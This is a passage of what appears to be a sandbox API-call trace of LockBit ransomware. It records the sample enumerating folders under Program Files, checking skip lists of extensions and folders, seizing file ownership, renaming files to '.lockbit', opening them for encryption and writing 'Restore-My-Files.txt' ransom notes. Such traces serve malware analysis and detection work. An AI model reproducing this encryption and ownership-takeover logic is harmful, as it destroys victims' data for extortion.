returned 1 [0079.826] lstrcmpiW (lpString1=".rom", lpString2=".avi") returned 1 [0079.826] lstrcmpiW (lpString1=".msc", lpString2=".avi") returned 1 [0079.826] lstrcmpiW (lpString1=".spl", lpString2=".avi") returned 1 [0079.826] lstrcmpiW (lpString1=".ps1", lpString2=".avi") returned 1 [0079.826] lstrcmpiW (lpString1=".msu", lpString2=".avi") returned 1 [0079.826] lstrcmpiW (lpString1=".ics", lpString2=".avi") returned 1 [0079.826] lstrcmpiW (lpString1=".key", lpString2=".avi") returned 1 [0079.826] lstrcmpiW (lpString1=".mp3", lpString2=".avi") returned 1 [0079.826] lstrcmpiW (lpString1=".reg", lpString2=".avi") returned 1 [0079.826] lstrcmpiW (lpString1=".dll", lpString2=".avi") returned 1 [0079.826] lstrcmpiW (lpString1=".ini", lpString2=".avi") returned 1 [0079.826] lstrcmpiW (lpString1=".idx", lpString2=".avi") returned 1 [0079.826] lstrcmpiW (lpString1=".sys", lpString2=".avi") returned 1 [0079.826] lstrcmpiW (lpString1=".hlp", lpString2=".avi") returned 1 [0079.826] lstrcmpiW (lpString1=".ico", lpString2=".avi") returned 1 [0079.827] lstrcmpiW (lpString1=".lnk", lpString2=".avi") returned 1 [0079.827] lstrcmpiW (lpString1=".rdp", lpString2=".avi") returned 1 [0079.827] wsprintfW (in: param_1=0x344d620, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0079.827] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="FlickAnimation.avi") returned 1 [0079.827] lstrcmpiW (lpString1="ntldr", lpString2="FlickAnimation.avi") returned 1 [0079.827] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="FlickAnimation.avi") returned 1 [0079.827] lstrcmpiW (lpString1="bootsect.bak", lpString2="FlickAnimation.avi") returned -1 [0079.827] lstrcmpiW (lpString1="autorun.inf", lpString2="FlickAnimation.avi") returned -1 [0079.827] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\") returned="" [0079.827] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned=".avi" [0079.827] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0079.827] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0079.827] lstrcmpiW (lpString1=".7z", lpString2=".avi") returned -1 [0079.827] lstrcmpiW (lpString1=".ckp", lpString2=".avi") returned 1 [0079.827] lstrcmpiW (lpString1=".dacpac", lpString2=".avi") returned 1 [0079.827] lstrcmpiW (lpString1=".db", lpString2=".avi") returned 1 [0079.827] lstrcmpiW (lpString1=".db-shm", lpString2=".avi") returned 1 [0079.827] lstrcmpiW (lpString1=".db-wal", lpString2=".avi") returned 1 [0079.827] lstrcmpiW (lpString1=".db3", lpString2=".avi") returned 1 [0079.827] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0079.827] lstrcmpiW (lpString1=".dbc", lpString2=".avi") returned 1 [0079.827] lstrcmpiW (lpString1=".dbs", lpString2=".avi") returned 1 [0079.827] lstrcmpiW (lpString1=".dbt", lpString2=".avi") returned 1 [0079.827] lstrcmpiW (lpString1=".dbv", lpString2=".avi") returned 1 [0079.827] lstrcmpiW (lpString1=".frm", lpString2=".avi") returned 1 [0079.828] lstrcmpiW (lpString1=".mdf", lpString2=".avi") returned 1 [0079.828] lstrcmpiW (lpString1=".mrg", lpString2=".avi") returned 1 [0079.828] lstrcmpiW (lpString1=".mwb", lpString2=".avi") returned 1 [0079.828] lstrcmpiW (lpString1=".myd", lpString2=".avi") returned 1 [0079.828] lstrcmpiW (lpString1=".ndf", lpString2=".avi") returned 1 [0079.828] lstrcmpiW (lpString1=".qry", lpString2=".avi") returned 1 [0079.828] lstrcmpiW (lpString1=".sdb", lpString2=".avi") returned 1 [0079.828] lstrcmpiW (lpString1=".sdf", lpString2=".avi") returned 1 [0079.828] lstrcmpiW (lpString1=".sql", lpString2=".avi") returned 1 [0079.828] lstrcmpiW (lpString1=".sqlite", lpString2=".avi") returned 1 [0079.828] lstrcmpiW (lpString1=".sqlite3", lpString2=".avi") returned 1 [0079.828] lstrcmpiW (lpString1=".sqlitedb", lpString2=".avi") returned 1 [0079.828] lstrcmpiW (lpString1=".tmd", lpString2=".avi") returned 1 [0079.828] wsprintfW (in: param_1=0x344cdc0, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.lockbit") returned 78 [0079.828] lstrcmpiW (lpString1=".avi", lpString2=".lockbit") returned -1 [0079.828] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.lockbit")) returned 0 [0079.828] GetLastError () returned 0x5 [0079.829] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0079.829] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0079.829] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0079.829] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0079.829] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0079.829] NtOpenFile (in: FileHandle=0x344cd68, DesiredAccess=0x80, ObjectAttributes=0x344cc18*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344cc10, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344cd68*=0x3b8, IoStatusBlock=0x344cc10*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0079.830] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0079.830] NtQueryInformationFile (in: FileHandle=0x3b8, IoStatusBlock=0x344cc30, FileInformation=0x344caf0, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344cc30, FileInformation=0x344caf0) returned 0x0 [0079.847] NtClose (Handle=0x3b8) returned 0x0 [0079.847] RtlFreeAnsiString (AnsiString="\\") [0079.847] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344cda4 | out: TokenHandle=0x344cda4*=0x3b8) returned 1 [0079.847] malloc (_Size=0x200) returned 0x53fcc0 [0079.847] GetTokenInformation (in: TokenHandle=0x3b8, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344cda0 | out: TokenInformation=0x53fcc0, ReturnLength=0x344cda0) returned 1 [0079.847] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344cd88, dwRevision=0x1 | out: pSecurityDescriptor=0x344cd88) returned 1 [0079.847] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344cd88, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344cd88) returned 1 [0079.847] CloseHandle (hObject=0x3b8) returned 1 [0079.847] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", SecurityInformation=0x1, pSecurityDescriptor=0x344cd88) returned 1 [0079.847] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", SecurityInformation=0x4, pSecurityDescriptor=0x344cd88) returned 1 [0079.848] free (_Block=0x53fcc0) [0079.848] lstrcmpiW (lpString1=".avi", lpString2=".lockbit") returned -1 [0079.848] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.lockbit")) returned 1 [0079.849] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b8 [0079.849] CreateIoCompletionPort (FileHandle=0x3b8, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0079.849] malloc (_Size=0x40068) returned 0x206b860 [0079.849] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x206b878 | out: lpFileSize=0x206b878*=1600388) returned 1 [0079.850] ReadFile (in: hFile=0x3b8, lpBuffer=0x206b894, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 0x0 [0079.979] GetLastError () returned 0x3e5 [0079.979] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink") returned 1 [0079.979] wsprintfW (in: param_1=0x344cb78, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\Restore-My-Files.txt") returned 72 [0079.979] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.979] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c53a9c4, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x5c53a9c4, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0xe29c9700, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0xe2800, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="FlickLearningWizard.exe", cAlternateFileName="")) returned 1 [0079.980] lstrcmpiW (lpString1=".", lpString2="FlickLearningWizard.exe") returned -1 [0079.990] lstrcmpiW (lpString1="..", lpString2="FlickLearningWizard.exe") returned -1 [0079.990] PathFindExtensionW (pszPath="FlickLearningWizard.exe") returned=".exe" [0079.990] lstrcmpiW (lpString1=".386", lpString2=".exe") returned -1 [0079.990] lstrcmpiW (lpString1=".cmd", lpString2=".exe") returned -1 [0079.990] lstrcmpiW (lpString1=".exe", lpString2=".exe") returned 0 [0079.991] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x98159680, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x98159680, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0079.991] lstrcmpiW (lpString1=".", lpString2="fr-FR") returned -1 [0079.991] lstrcmpiW (lpString1="..", lpString2="fr-FR") returned -1 [0079.991] lstrcmpiW (lpString1="fr-FR", lpString2="$windows.~bt") returned 1 [0079.991] lstrcmpiW (lpString1="fr-FR", lpString2="intel") returned -1 [0079.991] lstrcmpiW (lpString1="fr-FR", lpString2="msocache") returned -1 [0079.991] lstrcmpiW (lpString1="fr-FR", lpString2="$recycle.bin") returned 1 [0079.991] lstrcmpiW (lpString1="fr-FR", lpString2="$windows.~ws") returned 1 [0079.991] lstrcmpiW (lpString1="fr-FR", lpString2="tor browser") returned -1 [0079.991] lstrcmpiW (lpString1="fr-FR", lpString2="boot") returned 1 [0079.991] lstrcmpiW (lpString1="fr-FR", lpString2="system volume information") returned -1 [0079.991] lstrcmpiW (lpString1="fr-FR", lpString2="perflogs") returned -1 [0079.991] lstrcmpiW (lpString1="fr-FR", lpString2="google") returned -1 [0079.991] lstrcmpiW (lpString1="fr-FR", lpString2="application data") returned 1 [0079.991] lstrcmpiW (lpString1="fr-FR", lpString2="windows") returned -1 [0079.991] lstrcmpiW (lpString1="fr-FR", lpString2="windows.old") returned -1 [0079.991] lstrcmpiW (lpString1="fr-FR", lpString2="appdata") returned 1 [0079.991] lstrcmpiW (lpString1="fr-FR", lpString2="Windows nt") returned -1 [0079.991] lstrcmpiW (lpString1="fr-FR", lpString2="Msbuild") returned -1 [0079.991] lstrcmpiW (lpString1="fr-FR", lpString2="Microsoft") returned -1 [0079.991] lstrcmpiW (lpString1="fr-FR", lpString2="All users") returned 1 [0079.991] lstrcmpiW (lpString1="fr-FR", lpString2="mozilla") returned -1 [0079.991] wsprintfW (in: param_1=0x344d200, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR") returned 57 [0079.991] wsprintfW (in: param_1=0x344ca60, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\*") returned 59 [0079.991] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\*" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-fr\\*"), fInfoLevelId=0x0, lpFindFileData=0x344cf48, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x344cf48) returned 0x2e3290 [0080.021] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0080.021] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x98159680, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x98159680, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="..", cAlternateFileName="")) returned 1 [0080.021] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0080.021] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0080.021] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8311729d, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8311729d, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8311729d, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0080.021] lstrcmpiW (lpString1=".", lpString2="tipresx.dll.mui") returned -1 [0080.021] lstrcmpiW (lpString1="..", lpString2="tipresx.dll.mui") returned -1 [0080.021] PathFindExtensionW (pszPath="tipresx.dll.mui") returned=".mui" [0080.021] lstrcmpiW (lpString1=".386", lpString2=".mui") returned -1 [0080.021] lstrcmpiW (lpString1=".cmd", lpString2=".mui") returned -1 [0080.021] lstrcmpiW (lpString1=".exe", lpString2=".mui") returned -1 [0080.021] lstrcmpiW (lpString1=".ani", lpString2=".mui") returned -1 [0080.021] lstrcmpiW (lpString1=".adv", lpString2=".mui") returned -1 [0080.021] lstrcmpiW (lpString1=".theme", lpString2=".mui") returned 1 [0080.021] lstrcmpiW (lpString1=".msi", lpString2=".mui") returned -1 [0080.021] lstrcmpiW (lpString1=".msp", lpString2=".mui") returned -1 [0080.021] lstrcmpiW (lpString1=".com", lpString2=".mui") returned -1 [0080.021] lstrcmpiW (lpString1=".diagpkg", lpString2=".mui") returned -1 [0080.021] lstrcmpiW (lpString1=".nls", lpString2=".mui") returned 1 [0080.021] lstrcmpiW (lpString1=".diagcab", lpString2=".mui") returned -1 [0080.021] lstrcmpiW (lpString1=".lock", lpString2=".mui") returned -1 [0080.021] lstrcmpiW (lpString1=".ocx", lpString2=".mui") returned 1 [0080.021] lstrcmpiW (lpString1=".mpa", lpString2=".mui") returned -1 [0080.021] lstrcmpiW (lpString1=".cpl", lpString2=".mui") returned -1 [0080.021] lstrcmpiW (lpString1=".mod", lpString2=".mui") returned -1 [0080.021] lstrcmpiW (lpString1=".hta", lpString2=".mui") returned -1 [0080.022] lstrcmpiW (lpString1=".icns", lpString2=".mui") returned -1 [0080.022] lstrcmpiW (lpString1=".prf", lpString2=".mui") returned 1 [0080.022] lstrcmpiW (lpString1=".rtp", lpString2=".mui") returned 1 [0080.022] lstrcmpiW (lpString1=".diagcfg", lpString2=".mui") returned -1 [0080.022] lstrcmpiW (lpString1=".msstyles", lpString2=".mui") returned -1 [0080.022] lstrcmpiW (lpString1=".bin", lpString2=".mui") returned -1 [0080.022] lstrcmpiW (lpString1=".hlp", lpString2=".mui") returned -1 [0080.022] lstrcmpiW (lpString1=".shs", lpString2=".mui") returned 1 [0080.022] lstrcmpiW (lpString1=".drv", lpString2=".mui") returned -1 [0080.022] lstrcmpiW (lpString1=".wpx", lpString2=".mui") returned 1 [0080.022] lstrcmpiW (lpString1=".bat", lpString2=".mui") returned -1 [0080.022] lstrcmpiW (lpString1=".rom", lpString2=".mui") returned 1 [0080.022] lstrcmpiW (lpString1=".msc", lpString2=".mui") returned -1 [0080.022] lstrcmpiW (lpString1=".spl", lpString2=".mui") returned 1 [0080.022] lstrcmpiW (lpString1=".ps1", lpString2=".mui") returned 1 [0080.022] lstrcmpiW (lpString1=".msu", lpString2=".mui") returned -1 [0080.022] lstrcmpiW (lpString1=".ics", lpString2=".mui") returned -1 [0080.022] lstrcmpiW (lpString1=".key", lpString2=".mui") returned -1 [0080.022] lstrcmpiW (lpString1=".mp3", lpString2=".mui") returned -1 [0080.022] lstrcmpiW (lpString1=".reg", lpString2=".mui") returned 1 [0080.022] lstrcmpiW (lpString1=".dll", lpString2=".mui") returned -1 [0080.022] lstrcmpiW (lpString1=".ini", lpString2=".mui") returned -1 [0080.022] lstrcmpiW (lpString1=".idx", lpString2=".mui") returned -1 [0080.022] lstrcmpiW (lpString1=".sys", lpString2=".mui") returned 1 [0080.022] lstrcmpiW (lpString1=".hlp", lpString2=".mui") returned -1 [0080.022] lstrcmpiW (lpString1=".ico", lpString2=".mui") returned -1 [0080.022] lstrcmpiW (lpString1=".lnk", lpString2=".mui") returned -1 [0080.022] lstrcmpiW (lpString1=".rdp", lpString2=".mui") returned 1 [0080.022] wsprintfW (in: param_1=0x344ce80, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0080.022] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="tipresx.dll.mui") returned -1 [0080.022] lstrcmpiW (lpString1="ntldr", lpString2="tipresx.dll.mui") returned -1 [0080.022] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="tipresx.dll.mui") returned -1 [0080.023] lstrcmpiW (lpString1="bootsect.bak", lpString2="tipresx.dll.mui") returned -1 [0080.023] lstrcmpiW (lpString1="autorun.inf", lpString2="tipresx.dll.mui") returned -1 [0080.023] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\") returned="" [0080.023] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\tipresx.dll.mui") returned=".mui" [0080.023] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0080.023] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0080.023] lstrcmpiW (lpString1=".7z", lpString2=".mui") returned -1 [0080.023] lstrcmpiW (lpString1=".ckp", lpString2=".mui") returned -1 [0080.023] lstrcmpiW (lpString1=".dacpac", lpString2=".mui") returned -1 [0080.023] lstrcmpiW (lpString1=".db", lpString2=".mui") returned -1 [0080.023] lstrcmpiW (lpString1=".db-shm", lpString2=".mui") returned -1 [0080.023] lstrcmpiW (lpString1=".db-wal", lpString2=".mui") returned -1 [0080.023] lstrcmpiW (lpString1=".db3", lpString2=".mui") returned -1 [0080.023] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0080.023] lstrcmpiW (lpString1=".dbc", lpString2=".mui") returned -1 [0080.023] lstrcmpiW (lpString1=".dbs", lpString2=".mui") returned -1 [0080.023] lstrcmpiW (lpString1=".dbt", lpString2=".mui") returned -1 [0080.023] lstrcmpiW (lpString1=".dbv", lpString2=".mui") returned -1 [0080.023] lstrcmpiW (lpString1=".frm", lpString2=".mui") returned -1 [0080.023] lstrcmpiW (lpString1=".mdf", lpString2=".mui") returned -1 [0080.023] lstrcmpiW (lpString1=".mrg", lpString2=".mui") returned -1 [0080.023] lstrcmpiW (lpString1=".mwb", lpString2=".mui") returned 1 [0080.023] lstrcmpiW (lpString1=".myd", lpString2=".mui") returned 1 [0080.023] lstrcmpiW (lpString1=".ndf", lpString2=".mui") returned 1 [0080.023] lstrcmpiW (lpString1=".qry", lpString2=".mui") returned 1 [0080.023] lstrcmpiW (lpString1=".sdb", lpString2=".mui") returned 1 [0080.023] lstrcmpiW (lpString1=".sdf", lpString2=".mui") returned 1 [0080.023] lstrcmpiW (lpString1=".sql", lpString2=".mui") returned 1 [0080.023] lstrcmpiW (lpString1=".sqlite", lpString2=".mui") returned 1 [0080.023] lstrcmpiW (lpString1=".sqlite3", lpString2=".mui") returned 1 [0080.023] lstrcmpiW (lpString1=".sqlitedb", lpString2=".mui") returned 1 [0080.023] lstrcmpiW (lpString1=".tmd", lpString2=".mui") returned 1 [0080.023] wsprintfW (in: param_1=0x344c620, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\tipresx.dll.mui.lockbit") returned 81 [0080.023] lstrcmpiW (lpString1=".mui", lpString2=".lockbit") returned 1 [0080.024] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-fr\\tipresx.dll.mui"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\tipresx.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-fr\\tipresx.dll.mui.lockbit")) returned 0 [0080.024] GetLastError () returned 0x5 [0080.024] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0080.024] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0080.024] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0080.025] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0080.025] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0080.025] NtOpenFile (in: FileHandle=0x344c5c8, DesiredAccess=0x80, ObjectAttributes=0x344c478*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-fr\\tipresx.dll.mui"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344c470, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344c5c8*=0x3b0, IoStatusBlock=0x344c470*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0080.025] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0080.025] NtQueryInformationFile (in: FileHandle=0x3b0, IoStatusBlock=0x344c490, FileInformation=0x344c350, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344c490, FileInformation=0x344c350) returned 0x0 [0080.159] NtClose (Handle=0x3b0) returned 0x0 [0080.160] RtlFreeAnsiString (AnsiString="\\") [0080.160] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344c604 | out: TokenHandle=0x344c604*=0x3b0) returned 1 [0080.160] malloc (_Size=0x200) returned 0x53fcc0 [0080.160] GetTokenInformation (in: TokenHandle=0x3b0, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344c600 | out: TokenInformation=0x53fcc0, ReturnLength=0x344c600) returned 1 [0080.160] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344c5e8, dwRevision=0x1 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0080.160] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344c5e8, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0080.160] CloseHandle (hObject=0x3b0) returned 1 [0080.160] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\tipresx.dll.mui", SecurityInformation=0x1, pSecurityDescriptor=0x344c5e8) returned 1 [0080.160] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\tipresx.dll.mui", SecurityInformation=0x4, pSecurityDescriptor=0x344c5e8) returned 1 [0080.161] free (_Block=0x53fcc0) [0080.161] lstrcmpiW (lpString1=".mui", lpString2=".lockbit") returned 1 [0080.161] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-fr\\tipresx.dll.mui"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\tipresx.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-fr\\tipresx.dll.mui.lockbit")) returned 1 [0080.162] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\tipresx.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-fr\\tipresx.dll.mui.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b0 [0080.162] CreateIoCompletionPort (FileHandle=0x3b0, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0080.162] malloc (_Size=0x40068) returned 0x206b860 [0080.162] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x206b878 | out: lpFileSize=0x206b878*=4096) returned 1 [0080.162] ReadFile (in: hFile=0x3b0, lpBuffer=0x206b894, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 0x0 [0080.164] GetLastError () returned 0x3e5 [0080.164] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\tipresx.dll.mui" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR") returned 1 [0080.164] wsprintfW (in: param_1=0x344c3d8, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\Restore-My-Files.txt") returned 78 [0080.164] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-fr\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 